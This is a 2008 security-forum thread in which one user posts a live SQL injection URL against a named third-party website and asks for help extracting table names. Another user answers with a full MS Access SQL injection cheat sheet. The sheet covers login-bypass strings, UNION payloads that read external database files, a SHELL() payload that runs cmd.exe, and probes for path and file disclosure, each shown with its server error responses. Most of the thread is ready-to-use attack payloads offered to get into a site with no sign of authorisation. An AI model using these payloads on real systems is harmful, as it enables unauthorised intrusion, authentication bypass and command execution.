|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 82
Members: 0
Total: 82
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
stuck in SQL injection |
|
Posted: Thu Aug 07, 2008 5:31 pm |
|
|
droidman |
Active user |
|
|
Joined: Dec 10, 2007 |
Posts: 31 |
|
|
|
|
|
|
|
usually i dont ask for help on sql injection but this time i have no choice since i got really stuck and cant find any information. maybe its just me or....
URL:
Code: | http://www.buddhaclub.ws/xpressmailing/subscritor.asp?-=&nome=&email=%27UNION%20SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%27&submit=procurar |
Error:
Code: | Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] Could not find file 'c:\windows\system32\inetsrv\INFORMATION_SCHEMA.mdb'.
/xpressmailing/subscritor.asp, line 343 |
so i cant find any table names and i'm really no expert so.. any help? |
|
|
|
|
|
|
|
|
Posted: Thu Aug 07, 2008 6:59 pm |
|
|
oniric |
Advanced user |
|
|
Joined: Jul 24, 2008 |
Posts: 65 |
|
|
|
|
|
|
|
It's a Microsoft Access database. I can post you some info about Access SQLi. I'm sure this would help you
Code: | % Access SQL Injection
% brett.moore_at_security-assessment.com
============================================================================
Nothing new here, move along..
****************************************************************************
% MS Access system tables
****************************************************************************
MSysACEs
MSysObjects
MSysQueries
MSysRelationships
****************************************************************************
% MS Access command execution, (older versions only)
****************************************************************************
[Auth Page Script]
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT * FROM users where pass='"& pass &"' and user='"& user & "'"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
[Auth Page Bypass]
user = |SHELL("cmd.exe /c dir > c:\test.txt")|
pass = test
****************************************************************************
% Auth Bypass, Basic
****************************************************************************
[Auth Page Script]
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT * FROM users where pass='"& pass &"' and user='"& user & "'"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
' Access Allowed
end if
[Auth Page Bypass]
user = ' or '1'='1
pass = test
****************************************************************************
% Auth Bypass, Simple
****************************************************************************
[Auth Page Script]
user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
Conn.Open dsn
SQL = "SELECT user,pass FROM users where user='"& user & "'"
rs.open sql,conn
if rs.eof and rs.bof then
' Access Denied
else
if (rs("pass") = pass) then
' Access Allowed
else
' Access Denied
end if
end if
[Auth Page Bypass Using Shares]
user = ' union select name,password from table1 in '\\share\test\test.mdb
pass = password that is set in \\share\test\test.mdb
[Auth Page Bypass Local mdbs]
user = ' union select '0test','0test' from customers in
'C:\winnt\Help\iisHelp\iis\htm\tutorial\eecustmr.mdb'
pass = 0test
[Union Notes]
Remeber when using unions the sort order can affect the first record
returned.
****************************************************************************
% System Path Disclosure
****************************************************************************
[Sql String]
user = test' union select names from msysobjects in '.
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine
cannot
open the file 'C:\WINNT\system32'. It is already opened exclusively by
another user,
or you need permission to view its data.
****************************************************************************
% Verify File Exists
****************************************************************************
[Sql String - non-existant file]
user = test' union select name from msysobjects in '\proof
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Could not find file 'C:\proof'.
[Sql String - existant]
user = test' union select name from msysobjects in '\proof.txt
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Unrecognized database format
'C:\proof.txt'.
****************************************************************************
% Verify Path Exists
****************************************************************************
[Sql String - non-existant path]
test' union select name from msysobjects in '\nopath\sqlerr
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] 'C:\nopath\sqlerr' is not a valid
path.
Make sure that the path name is spelled correctly and that you are
connected to the
server on which the file resides.
[Sql String - existant path]
user = test' union select name from msysobjects in '\inetpub\sqlerr
[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Could not find file
'C:\inetpub\sqlerr'. |
|
|
|
|
|
|
|
|
|
Posted: Fri Aug 08, 2008 9:40 pm |
|
|
oniric |
Advanced user |
|
|
Joined: Jul 24, 2008 |
Posts: 65 |
|
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|